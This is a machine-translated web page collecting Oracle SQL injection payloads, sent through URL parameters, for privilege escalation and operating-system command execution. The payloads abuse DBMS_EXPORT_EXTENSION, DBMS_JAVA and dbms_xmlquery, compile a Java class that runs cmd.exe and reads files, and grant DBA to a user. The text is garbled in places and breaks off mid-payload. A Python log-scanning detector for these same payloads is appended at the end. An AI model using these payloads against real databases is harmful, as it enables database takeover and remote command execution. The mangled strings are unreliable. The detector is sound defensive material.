Summary of Oracle blind injection error statements and Oracle privilege escalation statements

Source: Internet
Author: User

And (select SYS. DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES ('foo', 'bar', 'dbms _ OUTPUT ". PUT (: P1); execute immediate "declare pragma AUTONOMOUS_TRANSACTION; begin execute immediate" begin dbms_java.grant_permission ("PUBLIC", "SYS: java. io. filePermission "," <> "," execute "); end;"; END; -', 'sys', 0, '1', 0) from dual) is not null-
 
Create Function
 
http://ooo/1.jsp?1=String ''and (select SYS. DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES ('foo', 'bar', 'dbms _ OUTPUT". PUT (: P1); EXECUTE IMMEDIATE "Declare pragma AUTONOMOUS_TRANSACTION; begin execute immediate" create Or replace function LinxRunCMD (p_cmd in Varchar2) return varchar2 as language java name "LinxUtil. runCMD (java. lang. String) return String """"; "; END;-', 'sys', 0, '1', 0) from dual) is not null-
 
Grant function execute privilege
 
Http: // ooo/1.jsp? 1 = String ''and (select SYS. DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES ('foo', 'bar', 'dbms _ OUTPUT ". PUT (: P1); execute immediate "declare pragma AUTONOMOUS_TRANSACTION; begin execute immediate" grant all on LinxRunCMD to public "; END;-', 'sy ', 0, '1', 0) from dual) is not null-
 
Execute OS code
 
http://ooo/1.jsp?1=String ''and (select sys.linxrunner('cmd.exe/c whoam') from dual) is not null-
 
Java permission
 
Affected Systems: 10g R2, 11g R1 and 11g R2
 
A) DBMS_JAVA.RUNJAVA
 
Affected Systems: 11gR1, 11gR2
 
http://ooo/1.jsp?1=String ''and (SELECT DBMS_JAVA.RUNJAVA ('oracle/aurora/util/Wrapper c: \ windows \ system32 \ cmd.exe/c dir> C :\\ OUT. lst') from dual) is not null-
 
B) DBMS_JAVA_TEST.FUNCALL
 
Affected Systems: 10g R2, 11g R1, 11g R2
 
http://ooo/1.jsp?1=String ''and (Select DBMS_JAVA_TEST.FUNCALL ('oracle/aurora/util/wrapper', 'main', 'c: \ windows \ system32 \ cmd.exe ', '/C', 'dir> c: \ OUT2.LST') from dual) is not null-
 
DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC
 
Affected Systems: Oracle 8, 9, 10g R1, 10g R2, 11g R1
 
 
1. Create Library
 
Http: // ooo/1.jsp? 1 = String ''and (select SYS. values (USER, 'validate _ GRP_OBJECTS_LOCAL (: canon_gname); execute immediate "declare pragma values; begin execute immediate" create or replace and compile java source named "LinxUtil" as import java. io. *; public class LinxUtil extends Object {public static String runCMD (String args) {try {BufferedReader myReader = new BufferedReader (n Ew inputstreamreader(runtime.getruntime(cmd.exe c (args). getInputStream (); String stemp, str = ""; while (stemp = myReader. readLine ())! = Null) str + = stemp + "\ n"; myReader. close (); return str;} catch (Exception e) {returne. toString () ;}} public static String readFile (String filename) {try {BufferedReader myReader = new BufferedReader (new FileReader (filename); String stemp, str = ""; while (stemp = myReader. readLine ())! = Null) str + = stemp + "\ n"; myReader. close (); return str;} catch (Exception e) {return e. toString () ;}}" "; END;-', 'ccccc') from dual) is not null-
 
2. Granting JAVA permissions
 
Http://www.bkjia.com/1.jsp? 1 = String ''and (select SYS. revoke (USER, 'validate _ GRP_OBJECTS_LOCAL (: canon_gname); execute immediate "declare pragma AUTONOMOUS_TRANSACTION; begin execute immediate" create or replace function LinxRunCMD (p_cmd in varchar2) return varchar2 as language java name "LinxUtil. runCMD (java. lang. string) return String "; END;-', 'ccccc') from dual) is not null-
 
3. Making function executable by PUBLIC
 
Http: // ooo/1.jsp? 1 = String ''and (select SYS. revoke (USER, 'validate _ GRP_OBJECTS_LOCAL (: canon_gname); execute immediate "declare pragma AUTONOMOUS_TRANSACTION; beginexecute immediate" grant all on LinxRunCMD to public "; END; -', 'ccccc') from dual) is not null-
 
4. Executing OS Code
 
http://ooo/1.jsp?1=String ''and (select sys.linxrunner('cmd.exe/c whoam') from dual) is not null-
 
After patching, the CREATE PROCEDURE privilege is required.
 
1. Create Function
 
http://www.bkjia.com/default.jsp?1=intenger and (select dbms_xmlquery.newcontext ('descare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate "create or replace function pwn2 return varchar2 authid current_user is PRAGMA autonomous_transaction; BEGIN execute immediate "grant dba to scott"; commit; return "z"; END; "; commit; end; ') from dual) is not null-
 
2. Exploiting SYS.LT
 
Http: // ooo/default. jsp? 1 = intenger and (select dbms_xmlquery.newcontext ('Clare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate "begin SYS. LT. CREATEWORKSPACE ("A10" and scott. pwn2 () = "x"); YS. LT. REMOVEWORKSPACE ("A10" and scott. pwn2 () = "x"); end; "; commit; end; ') from dual) is not null-
 
Let's look at the October 2010 Critical Patch Update (CPU), whose vulnerable versions are 10gR1, 10gR2, 11gR1 and 11gR2, and at the vulnerability in the package sys.dbms_cdc_publish.create_change_set, which allows a user with the EXECUTE_CATALOG_ROLE privilege to become DBA.
 
http://ooo/default.jsp?1=intenger and (select dbms_xmlquery.newcontext ('Clare PRAGMAAUTONOMOUS_TRANSACTION
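As an added defensive example (not part of the original page), the following Python scans web-server access-log lines for the package entry points this page lists as privilege-escalation sinks (DBMS_EXPORT_EXTENSION, DBMS_JAVA.RUNJAVA, DBMS_JAVA_TEST.FUNCALL, DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC, DBMS_XMLQUERY.NEWCONTEXT, DBMS_CDC_PUBLISH.CREATE_CHANGE_SET, SYS.LT) together with the AUTONOMOUS_TRANSACTION / EXECUTE IMMEDIATE / GRANT wrapper the injected strings share, after undoing URL encoding and the whitespace splitting seen above. The combined log format, the regex set, the severity scheme and the sample lines are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# Sinks this page lists for privilege escalation (names from the page; the regex
# set, log format and sample data below are constructed for this example).
SINK_PATTERNS = (
    r"DBMS_EXPORT_EXTENSION\.GET_DOMAIN_INDEX_TABLES", r"DBMS_JAVA\.RUNJAVA",
    r"DBMS_JAVA_TEST\.FUNCALL", r"DBMS_REPCAT_RPC\.VALIDATE_REMOTE_RC",
    r"DBMS_XMLQUERY\.NEWCONTEXT", r"DBMS_CDC_PUBLISH\.CREATE_CHANGE_SET",
    r"LT\.(?:CREATE|REMOVE)WORKSPACE",
)
# The injected strings wrap DDL in an autonomous transaction, run it with EXECUTE
# IMMEDIATE and end in a grant; any of these next to a sink is a strong signal.
WRAPPER_PATTERNS = (
    r"PRAGMA\s+AUTONOMOUS_TRANSACTION", r"EXECUTE\s+IMMEDIATE",
    r"GRANT\s+(?:DBA|ALL)\b", r"DBMS_JAVA\.GRANT_PERMISSION",
)
_SINK_RE = re.compile("|".join(SINK_PATTERNS), re.IGNORECASE)
_WRAP_RE = re.compile("|".join(WRAPPER_PATTERNS), re.IGNORECASE)
_REQ_RE = re.compile(r'"(?:GET|POST)\s+(\S+)')  # request target, combined log format

def normalize(raw: str) -> str:
    """Decode twice (double encoding is a common evasion), drop NULs, and remove
    whitespace around '.' and '_' so 'SYS. DBMS_JAVA. RUNJAVA' -> 'SYS.DBMS_JAVA.RUNJAVA'."""
    text = unquote_plus(unquote_plus(raw)).replace("\x00", "")
    text = re.sub(r"\s*([._])\s*", r"\1", text)
    return re.sub(r"\s+", " ", text)

def classify(log_line: str) -> dict:
    """Severity plus the sinks and wrapper markers found in one access-log line."""
    m = _REQ_RE.search(log_line)
    text = normalize(m.group(1) if m else log_line)
    sinks = sorted({s.upper() for s in _SINK_RE.findall(text)})
    markers = sorted({re.sub(r"\s+", " ", w.upper()) for w in _WRAP_RE.findall(text)})
    # high: sink plus DDL/grant wrapper; medium: sink alone; low: wrapper without a known sink
    severity = ("high" if sinks and markers else "medium" if sinks
                else "low" if len(markers) >= 2 else "none")
    return {"severity": severity, "sinks": sinks, "markers": markers}

# Constructed sample lines (not real traffic); payload bodies are abbreviated.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Oct/2010:10:00:01 +0000] "GET /1.jsp?1=String%27%27and%20(select%20SYS.%20DBMS_EXPORT_EXTENSION'
    '.GET_DOMAIN_INDEX_TABLES(%27foo%27,%27bar%27,%27...execute%20immediate%20%22declare%20pragma%20AUTONOMOUS_TRANSACTION;...%27)%20from%20dual)%20is%20not%20null-- HTTP/1.1" 500 1024',
    '10.0.0.6 - - [01/Oct/2010:10:00:02 +0000] "GET /1.jsp?1=42 HTTP/1.1" 200 512',
    '10.0.0.7 - - [01/Oct/2010:10:00:03 +0000] "GET /default.jsp?1=1%20and%20(select%20dbms_xmlquery.newcontext(%27declare%20PRAGMA'
    '%20AUTONOMOUS_TRANSACTION;%20begin%20execute%20immediate%20%22grant%20dba%20to%20scott%22;%20end;%27)%20from%20dual)%20is%20not%20null-- HTTP/1.1" 200 700',
]
```

Feed the classifier your own access log one line at a time; anything rated high deserves correlation with the database audit trail (DDL and GRANT statements issued by the application account around that timestamp).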
